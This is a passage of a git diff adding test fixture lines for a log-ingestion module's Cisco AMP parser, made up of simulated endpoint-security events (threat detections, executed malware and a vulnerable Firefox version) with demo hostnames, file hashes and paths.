Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595368","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":360000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669147354595367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669143059628000,"timestamp":1610705937,"timestamp_nanoseconds":968000000,"date":"2021-01-15T10:18:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669143059628070","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259286289613000,"timestamp":1610705905,"timestamp_nanoseconds":669000000,"date":"2021-01-15T10:18:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259286289612895","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259234750005000,"timestamp":1610705893,"timestamp_nanoseconds":657000000,"date":"2021-01-15T10:18:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259234750005342","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259183210398000,"timestamp":1610705881,"timestamp_nanoseconds":645000000,"date":"2021-01-15T10:18:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259183210397789","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180335966167761000,"timestamp":1610705878,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:17:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180335966167760897","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":653000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":613000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
index 07b32280fdf1..6fc2752766aa 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp2.ndjson.log-expected.json
@@ -3,7 +3,7 @@
         "@timestamp": "2021-01-15T11:59:52.000Z",
         "cisco.amp.computer.active": true,
         "cisco.amp.computer.connector_guid": "test_connector_guid",
